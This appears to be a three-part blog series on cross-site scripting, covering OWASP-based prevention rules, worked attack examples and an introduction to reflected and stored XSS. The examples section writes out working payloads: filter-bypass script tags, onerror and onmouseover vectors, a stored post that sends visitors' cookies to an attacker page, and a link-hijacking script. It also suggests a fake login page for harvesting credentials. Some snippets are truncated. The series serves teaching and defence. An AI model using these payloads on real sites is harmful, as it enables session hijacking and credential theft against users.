Cross-site Scripting – Prevention

This is the final post in my short series on cross-site scripting. After explaining the fundamentals of XSS and having some fun with a few examples, I’d now like to discuss how to prevent these naughty little scripts from threatening web app users. Preventing XSS attacks is the responsibility of the web designer. However, there are a few options for keeping yourself (the user) safe from attack which I’ll discuss afterward.

As I’ve made quite clear in my earlier posts, cross-site scripting attacks occur when untrusted data gets inserted dynamically into the HTML body without being validated first. However, writing the encoders necessary to cover all possible types of input data requires a great deal of effort and can be incredibly difficult. Fortunately, OWASP has already taken the difficulty out of this with ESAPI – Enterprise Security Application Programming Interface. ESAPI is a web app security library that provides security controls such as authentication, access control, input validation, output encoding and escaping, and a lot more. It’s an absolutely incredible tool with bindings for several different languages. If you want a secure web app, use ESAPI. End of story. Though if you’re a horribly deranged .NET developer, Microsoft offers the AntiXSS library. However, I can’t vouch for it since I’m a free and open source software advocate.

OWASP has a really great article called the XSS Prevention Cheat Sheet. The positive model they describe is excellent. In fact, I think it’s so great that I’m going to make it the subject of this post. OWASP has defined 7 rules for strengthening web apps. Let’s take a look at each of these rules.

Rule 0: Never Insert Untrusted Data Except in Allowed Locations

If you’re a network administrator, think of this as the “default deny” ruleset used in firewalls. That is, unless it’s within one of the slots described in Rules 1 – 5, don’t insert untrusted data anywhere else into the body of an HTML document. Nowhere! En ninguna parte! Hiçbir yerde! 아직은 없어요






I can’t think of any legitimate reason for inserting untrusted data into an HTML comment or directly inside a <script> tag. It’s completely asinine. If your web app requires it, I urge you to seriously reconsider the design of your web app.

Rule 1: HTML Escape Before Inserting Untrusted Data into HTML Element Content

This should be a no-brainer. I hope that by now I’ve made it very clear that you must escape untrusted data before inserting it into any dynamic HTML content.



All other HTML elements as well...

Furthermore, you should also use HTML character entity references to escape the following characters:

When this goes in This comes out
& &amp;
< &lt;
> &gt;
" &quot;
' &#x27;
/ &#x2f;

The reason these need to be escaped is because they all introduce a new execution context for the HTML interpreter. Depending on the character, they can be used to either introduce a new subcontext or close the current one.

Rule 2: Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes

This rule only applies to the so-called “common” attributes like name and width. It does not apply to the more advanced attributes like src, href, or class. Neither should it be used with event handlers such as onclick, onload, or onmouseover (event handlers fall under Rule 3).




All characters below ASCII value 256 that are not alphanumeric should be escaped. If you like, you could use its respective named character entity reference (e.g. &quot; or &amp;) but it’d be easier to just use the numeric format (i.e. &#nnnn; or &#xhhhh;). Wikipedia has a decent list here (I’m totally in love with Wikipedia, by the way).

I should mention that it’s always a good idea to surround attribute values with single or double quotes. In fact, section 3.2.2 of the HTML 4.0 specification recommends it. Regardless of the effect on validators/checkers or issues of style, quoting attribute values does have some security implications. When attributes are properly quoted, they can only be escaped with the corresponding quote. However, it’s possible to break out of unquoted attributes with a number of different characters. Since the spec says that unquoted attributes can only contain alphanumeric characters, hyphens, periods and underscores, an attacker can use any other character to break out of the context. For example, % * + , - / ; ^ | and the space character (ASCII value 0x20).

Rule 3: JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values

Like I said before, if your web app allows for dynamically generated JavaScript, ask yourself “Is there some other way I can implement the behavior I want?” You’d be putting your users at a tremendous risk. However, if it’s absolutely essential, then be sure to follow this rule.




The only place to put untrusted data where it’s mostly free from harm is inside a quoted data value. This is for the very same reason that you should used quoted attribute values: switching into a new execution context anywhere else is practically child’s play. Just about any JavaScript operator can be used: ; == != && || ?:.

Again, all characters below ASCII value 256 that are not alphanumeric should be escaped. Since we’re talking about JavaScript now and not HTML, characters are escaped using the \xHH syntax. It’s important that you use the ASCII hexadecimal value and not something like \&, \#, or \@. There’s one gotcha: using \" leaves you vulnerable to “escape-the-escape” attacks. All the attacker has to do is include \" which would get transformed to \\" and enables the quote. Pretty clever, right?

Rule 4: CSS Escape and Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values

When inserting untrusted data into CSS <style> tags or stylesheets, it’s important to remember two things: first, it should be properly validated and second, it should only be put inside property values. Placing it anywhere else is just asking for trouble.

<style> selector { property: ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE; } </style>

<style> selector { property: "ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE"; } </style>

<span style="property: ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE">text</style>

Since CSS allows you to use JavaScript to dynamically generate property values, there are a few other things you should be aware of. Make sure that you filter URLs so that they only begin with http: and not javascript:. Internet Explorer 5 introduced a new extension called CSS expressions which you must filter out as well. Even when escaped, there is no safe way to place untrusted data into these expressions.

{ background-url: “javascript:alert('XSS')”; }

{ text-size: “expression(alert('XSS'))”; }

The same rules from Rule 3 for character escaping applies here as well. That is, all characters below ASCII value 256 that are not alphanumeric should be escaped. You also should not use shortcuts like \” for the same reason as in Rule 3.

Rule 5: URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values

Following this rule helps prevent the most common type of XSS attack: placing malicious code directly in GET request parameters.


All characters below ASCII value 256 that are not alphanumeric should be escaped. URLs use percent-encoding with the %HH syntax where HH is the hexadecimal ASCII value of the character. Character entity references are useless here.

Rule 6: Use an HTML Policy Engine to Validate or Clean User-driven HTML in an Outbound Way

If you want to allow users to embed HTML in their content but only a restricted subset of tags, this is where using a library like ESAPI will come in handy. It allows you to build up an HTML sanitizing whitelist policy very easily without having to write it yourself.

Customizing your policy is very easy. For example, to convert headers into <div> tags, you would use what’s called an element policy:

import org.owasp.html.HtmlPolicyBuilder;

new HtmlPolicyBuilder.allowElement(
    new ElementPolicy() {
        public String apply(String elementName, List attributes) {
            attributes.add("header-" + elementName);
            return "div";
    "h1", "h2", "h3", "h4", "h5", "h6").build(outputChannel);

For more information, see ESAPI’s javadoc for the Sanitizers and HtmlPolicyBuilder classes.

Bonus Rule: Use the HttpOnly Cookie Flag

The HttpOnly flag is an optional flag that can be included in the Set-Cookie field in the header of an HTTP request. It instructs the browser to use cookies only through the HTTP protocol. When set, a cookie will not be accessible though non-HTTP methods like JavaScript (e.g. document.cookie). As you can imagine, this makes it much more difficult for cookies to be stolen.

If you’re using Apache Tomcat as a servlet container, the HttpOnly flag can be set for all web apps in the conf/context.xml file:

<Context useHttpOnly=”true”>

In .NET 2.0, it can be set in the web.config file:

<httpCookies httpOnlyCookies=”true” … />

If you’re using PHP (excuse me while I throw up really quick), the flag can be set in the php.ini file using the parameter:

session.cookie_httponly = True

Most modern browsers support HttpOnly so you do not have to worry about issues of platform compatibility.

It’s important to note that these rules only help prevent reflected and stored XSS attacks. Preventing DOM-based attacks is a whole different story. Since I did not talk about DOM-based attacks in this series, I won’t be covering it here. If you’re interested, good ol’ OWASP has a separate article called the DOM-based XSS Prevention Cheat Sheet. Gotta love OWASP. ;)

While it’s impossible to completely eliminate the threat of XSS attacks, following these rules can really strengthen the security model of your web app. Input validation isn’t the key to preventing just XSS attacks but also other forms of code injection like SQL, LDAP, and SSI injection. If you are not cautious, user input forms can easily become a gateway for cyber criminals to compromise both your server and the innocent people who visit your website.

Even if you’re not a web developer, you can still protect yourself from XSS attacks as a user. The most obvious way is simply to disable JavaScript but not only is this less than 100% effective, it just downright stupid. In our modern world of Web 2.0, disabling JavaScript would severely cripple the functionality of nearly every site you visit.

The most effective way to protect yourself would be to use a wonderful little piece of software called NoScript. NoScript is an award-winning Firefox extension that permits executable web content (e.g. JavaScript, Java, Flash, Silverlight, etc.) to run only if the site has been previously deemed trustworthy by you. It implements numerous countermeasures for specific web exploits. Not only can it recognize potential XSS attacks, it also has a firewall-like component called the Application Boundaries Enforcer (ABE), prevents clickjacking with the ClearClick component, and features a few HTTPS enhancements. It even recognized my own attempts to use XSS on my machines which is fun to watch. I’ve been using NoScript for years and I can not recommend it enough. Best of all, it’s free and open source!

There’s also the (unoriginal) NotScripts for you Chrome and Opera users. However, it’s very simplistic and nowhere near as featureful as NoScript. Besides, you should be using Firefox anyway. There’s no reason not to. :P

I hope you’ve enjoyed fooling around with XSS as much as I have. It’s quite distinct from most other web app exploits (except for XSRF which is closely related). Quite frankly though, I’ve had about all I can handle for now with web technologies like JavaScript and HTML. I can tolerate it once in a while but my heart truly lies in lower level hacking like systems programming. At the moment, I’m reading Kevin Mitnick’s “The Art of Deception” so perhaps a post or two on social engineering is in order. We’ll see.

Cross-site Scripting – Examples

Last week I gave a general overview of cross-site scripting (XSS) and went over the basic attack theory. If you’re anything like me,  then you are probably eager to see XSS in action. Luckily for you, I’ve had a lot of fun this past week with XSS on my home network so I have quite a bit to write about.

Note: If you haven’t already done so, please read my previous post as I will be continuing where I last left off.

Searching for XSS flaws in web apps is a form of black box testing. That is, you typically won’t have any knowledge of the internal system and will need to use a variety of techniques to further understand its implementation. Sure there are some who might disagree with this and argue that it is instead a form of grey box testing. It doesn’t really matter. The truth is, the amount of knowledge you have about a particular web app will vary from site to site. It mostly depends on the amount of access you have to the source code. Semantic matters aside, the point is that you are going to have to perform some amount of information gathering first.

Generally speaking, using XSS to compromise a web app will involve three steps:

  1. Discover any input forms and determine how the GET/POST request variables relate to each input field.
  2. Further examine the code for each input field to detect possible vulnerabilities. This is typically accomplished by entering a harmless JavaScript statement like <script>alert('foobar')</script>.
  3. Analyze the server’s response. If the message box pops up, you’ve got decent foothold. If not, it may require you to further experiment with different encodings and filtering techniques.

These steps can either be done manually or using an automated fuzzing framework. Personally, I like to go the manual route but that’s just because most fuzzing frameworks have a tremendous learning curve. If you’re performing a large-scale penetration test, going with the web app fuzzing framework would definitely be the smart thing to do and save some time.

Let’s consider the welcome banner example I went over briefly in my previous post. Most articles and papers about XSS like to start out with this example. Imagine a social news bookmarking site like Digg. We’ll call it When users login, the site displays a friendly welcome banner in the upper corner of the page. Perhaps the code looks like this:



<form action="welcome.php" method="get">
    <label for="uname">Username:</label>
    <input type="text" name="uname" id="uname" />

    <label for="passwd">Password:</label>
    <input type="password" name="passwd" id="passwd" />

    <input type="submit" />



We see that the web app uses the GET request and two variables: uname and passwd (by the way, never ever, ever, ever use GET when transmitting passwords). We can check to see if properly sanitizes its user input field by using the following URL:<script>alert('XSS')</script>

If no form of sanitization is applied, this will result in a popup message that displays “XSS”. Awesome! We can now effectively use as our own personal JavaScript interpreter. This means that welcome.php will probably look something like this:



echo "Welcome " . $_GET['uname'];



Look at that; nothing! No character encoding or escaping whatsoever. It’s unlikely that you’ll encounter something as moronic as this though. You are more likely to see at least some type of escaping taking place but still lacking in some areas; thus, remaining vulnerable.

For instance, a web developer might try to filter script tags using regular expressions like this:

// Ima catch all those stupid h4x0rz
if (preg_match("/<script[^>]*>/", $_GET['uname'])) {
    echo "Nice try, jerk!";
else {
    echo "Welcome " . $_GET['uname'];

However, this can easily be circumvented. Can you guess how? Well, there are several ways but remember that HTML is case insensitive? Yeah, remember how ugly everybody’s code used to look during the 90’s? All we have to do is change the case of at least one of the letters in the word “script”.<SCRIPT>alert('XSS')</SCRIPT>

And now we’re back in business. Another way to circumvent attempts to filter input is to encode different parts of your script. Using the same filter, we can get around it using the following URL:<scrip&#x74;>alert('XSS')</script>

All I did here was encode the ASCII value for the letter ‘t’ which is 0x74. The examples could go on and on. There’d be no way to cover every possible way to get around content filtering since each web app is going to use different ways or a combination of ways to sanitize its input fields. Fortunately, RSnake has put together a very comprehensive list of common JavaScript attack vectors here.

Perhaps you’re thinking, “So what’s next? What can I do now?” The answer is: anything. That’s what makes XSS so fun! You have a nearly unlimited amount of room for creativity. When you’ve compromised a machine (and it better be your own) and you’re able to ask yourself, “What can I do with this now?”, you’re in for a fun time. You don’t always get that amount of freedom with certain exploits. I’ll go over some of the most common uses though.

XSS is most commonly used for session hijacking and cookie theft. I’d imagine because it’s astonishingly easy. Since everything up until now has been examples of reflected attacks, let me show you what a stored attack might look like.

Let’s say you’ve found an XSS vulnerability in the Tweedledum message boards. They allow you to include embedded HTML but try to filter it using the /(<script[^>]*>)*|(javascript:)*/ regular expression. You’re a super evil bad guy and want to steal everyone’s cookies. You’d probably post a message like this:

I'm just a normal post. Don't mind me. I'm definitely not stealing your
cookie so I can hijack your session and take over your account. Nope. Not

function stealMyCookiePlz() {
    window.location = '' + escape(document.cookie);

<img src="" onmouseover="javascript :stealMyCookiePlz()" />

This embeds a small script in the post that sends the user’s cookie to every time their mouse hovers over the image. You could be even more creative and make cookie_monster.php redirect the user right back to the original Tweedledum post. Or if stealing cookies isn’t enough, you could make cookie_monster.php into a fake Tweedledum login page saying something like “Your session has expired, please log back in” so that you could steal their credentials before redirecting them back to the forum.

Notice the uppercase R in the <script> tag and the space between javascript and : in the onmouseover event. This is so that the script slips through and doesn’t match the regular expression.

Yes, that last example was a bit contrived. If you really were a jerk hijacking people’s accounts, you wouldn’t want to risk people not hovering their mouse over the image. Instead you’d just send them to right away when the page loaded. However, I mixed things up a bit to demonstrate my next point: how HTML attributes and DOM events can be used in attack vectors.

Merely filtering out <script> tags is not enough to protect your site from XSS attacks. JavaScript statements can still appear inside HTML attributes and DOM event handlers. Similar to the last example, you could post:

<b onmouseover="window.history.back()">Just some "harmless" text. ;)</b>

This is just a harmless but really annoying prank that would send the user back to the previous page when their mouse hovered over the text.

One of my favorites is using an erroneous <img> tag:

<img src="" onerror="alert('Howdy!')" />

This one is really clever. The <img> tag points to an image that doesn’t exist. However, adding the onerror handler forces the code to execute. Pure genius!

One last example I want to look at uses error pages. We’ve all seen them before: 404 error: File not found. Some web developers like to be a fancy pants and configure their server to display a customized error page instead. (Fun fact: Internet Explorer before version 7 refused to display custom error pages unless they were larger than 512 bytes. Add that to the list of things IE won’t do.) If not done properly, they can be used for XSS attacks. An unwise web developer might implement a custom error page like this:

echo "Nah, you trippin' homez. ";
echo "Ain't no " . urldecode($_SERVER['REQUEST_URI']) . " page here.";
echo "Betta check yoself!";

This page would be rendered when querying a non-existent page. For example:

This would send the following response:

Nah, you trippin' homez. Ain't no /baz.html page here. Betta check yoself!

Oh no he didn’t! Ima pop some JS in his ass! Translation: “I am going to embed malicious JavaScript in your error page, sir.”<script>alert('Take that, jerk!')</script>

This time, you’d get the ghetto-ass error message but with the embedded script along with it. Now it’s just a matter of luring someone to the URL.

Ok, I lied. One more example. I just thought of another really cool idea:

window.onload = function() {
    var links = document.getElementsByTagName('a');

    for (var i = 0; i < links.length(); i++) {
        links[i].href = '';

This script would change every link on the page to point to This would be especially devastating in the case of a stored attack since all the links would be changed permanently.

There are also several tools available for testing XSS vulnerabilities. OWASP has the CAL9000 project. It’s a collection of web application security testing tools. Unfortunately, it’s no longer actively maintained but it might still prove useful nevertheless. There’s also XSS-Proxy which is a neat little Perl Script designed just for XSS. Another effective tool is ratproxy. Similar to CAL9000, it too is a web app security auditing tool that covers a broad range of security problems, not just XSS. Lastly, you may also want to try Burp Proxy. However, I don’t know much about it since it’s shareware.

Hopefully, this gives you a good idea of all the fun things that can be done using XSS. I highly urge you to quick setup a small LAMP server in a virtual machine and try it out for yourself. Don’t just take my word for it. It’s a blast! Even though XSS can be fun, it’s quite easy to see how quickly it can become a serious breach of security if in the wrong hands. For that reason, next week I will be writing about how to prevent these types of attacks.

Cross-site Scripting – An Introduction

You won’t find me delving into the world of web design too often. Once in a blue moon, maybe I’ll fool around with some JavaScript or XHTML but when I do, I just don’t find it to be that fun. That awful mash-up of control statements, formatting, and actual data leaves me with a strange combination of boredom and headache. That’s a whole other post though so I won’t digress. However, since I’m obviously writing this blog, I’ve had to bite the bullet for the past couple of days and refresh my memory of web applications. For some reason, I keep finding myself coming back to the subject of cross-site scripting. There’s just something about the idea of code “injection” that really gets me excited. Besides, according to CWE, cross-site scripting has become the most commonly reported security vulnerability next to buffer overflows; what’s not awesome about that!?

I’m going to make this into a three-part series of posts. Today will be a general overview of what cross-site scripting is and the different types of attacks. Next I’ll include some real world examples and common attack vectors. Things just wouldn’t be complete if I didn’t talk about how to prevent these naughty scripts and how to review your code for XSS vulnerabilities which will be the focus of the last post.

In its most basic form, cross-site scripting (XSS) is a form of code injection that allows an attacker to embed or “inject” malicious code into an otherwise legitimate website. Essentially, the attacker is taking advantage of the fact that the web application thinks it’s ok to store code from an unknown source because it doesn’t know any better. This code generally takes the form of client-side scripts in JavaScript but just about any embedded content poses a potential threat such as VBScript, PHP, ASP, Flash, ActiveX, etc. That’s part of what makes XSS so widespread; it’s not associated with just one or two languages. It’s not like you could use VBScript for your web app because it’s “safer than JavaScript.” XSS exists due to poor design practices on part of the web developer.

XSS attacks can occur anywhere a web application that makes use of input from the user but fails to sanitize it properly. Unvalidated user input is really just the first criteria for an attack. The real damage happens when that input is used by the server to generate dynamic content such as a results page.

So what can attackers do with all this? The consequences range from being a mere annoyance to total account take overs. In severe cases, an attacker can steal your session cookie, hijack your session, and completely take over your account. Even more dangerous, XSS vulnerabilities can lead to the installation of trojans, full disclosure of sensitive user information, redirection to other malicious sites, and on and on; the number of possibilities is really up to the attacker’s imagination. Think about what could happen if a pharmaceutical site was vulnerable to an XSS flaw. An attacker could modify dosage information for patients which could lead to an overdose. Imagine that: literally killing people with code. That’s some serious shit. It’d take a pretty heartless person to accomplish something like that but my point is that anything is possible with XSS.

A classic example is the user login form. When a user enters their username at a login page, the string is typically redisplayed unchanged after singing in to indicate that they have successfully logged in. If the username field is not properly sanitized by rejecting or at least encoding HTML control characters, it becomes a gaping hole for attackers to do as they please. This is actually a certain type of XSS called a reflected attack. Let’s take a look at what that means.

The types of attacks that use cross-site scripting as an attack vector are nearly limitless but security experts generally recognize two different types of attacks: non-persistent (or reflected) attacks and persistent (or stored) attacks. As a matter of fact, there’s actually a third type called a DOM-based attack where the DOM environment is actually modified. However, this is a more advanced form of XSS and I’m not really interested in going that deep into the subject. For those of you who are curious, OWASP has a great article about it here.

Non-persistent XSS vulnerabilities are among the most common types that show up and is generally what is referred to when people talk about cross-site scripting. They occur when input data supplied by a web form is included in the dynamic content of the server’s response. They are sometimes called reflected attacks because the injected code is said to be “reflected” off the web server. You might be thinking “What’s so dangerous about all this if all you can do is infect your own page? No big deal. Whatever, I’m just gonna go watch videos of dancing pigs now.” Well, you’re kind of right. However, sprinkle on a small layer of social engineering and now you’re getting somewhere. Reflected XSS attacks are usually delivered in emails where the victim is baited into visiting a seemingly innocent website. The included URL is specially crafted to point to a legitimate website but also contains the XSS vector.

Consider the following scenario. Imagine that you’ve just suffered a horribly traumatic brain aneurysm which has left your brain so impaired that you now actually enjoy visiting sites like Facebook and Twitter. <tap on the shoulder followed by whispering> Wait…what? Regular non-disabled people habitually update their Facebook status at a rate that nearly suggests narcissistic personality disorder too? I always thought those people were just mentally impaired. Hmm, guess you learn something dumb everyday. Anyway, imagine that you are a completely normal person logged into your Facebook. You receive an email informing you that Facebook has been super l33t h4ck3d and you need to re-login and change your password…fast! You, being a not mentally impaired person who believes that kind of thing, clicks on the link provided in the email. The link really does direct you to Facebook but contains some malicious JavaScript embedded in it. You login again, all fine and dandy, while your browser blindly executes the embedded script that steals your session cookie and sends it to Now evil bad guys can hijack your session by impersonating you. I’ll leave the rest up to your imagination. Actually, Facebook has fallen victim to several XSS attacks in the past.

The second type of XSS vulnerability is the persistent attack. This occurs when the data input by the attacker is not just included in the dynamic content but is actually stored on the web server permanently. That’s why it’s also called a stored attack. As you’d imagine, this is what makes it the most devastating of XSS flaws. This malicious code typically gets stored in places like databases, message boards, guestbooks, and blog comments. Since the code is stored on the server, it will permanently be displayed on normal pages to anybody that visits it; there’s no need to trick users into visiting a specially crafted URL.

Ever wondered why every message board you visit doesn’t allow you to embed HTML tags in your posts? Here’s why. Imagine an attacker – let’s call him Stu, Stu Pid – discovers that the Foobar message boards allow users to embed HTML tags in posts. Stu Pid starts a new thread with some malicious JavaScript embedded in it. He lays down some flamebait by giving it a highly controversial topic to ensure that plenty of people visit it to start a massive flame war. Maybe he calls it “Why GNU/Linux is Better Than Windows.” For each person that merely visits the page, Stu’s malicious code gets run within their browser, stealing their session cookie, and relaying it to his site. Stu Pid now owns the accounts of every person who viewed his thread. Given the subject matter, that’s probably a lot.

That’s the basics of cross-site scripting. Next week I’ll be setting up a simple web server with a LAMP stack on my home network and try to find all the different ways I can break it. Fun! In my next post, I’ll show you some of the things I was able to do with a couple of examples and common attack vectors.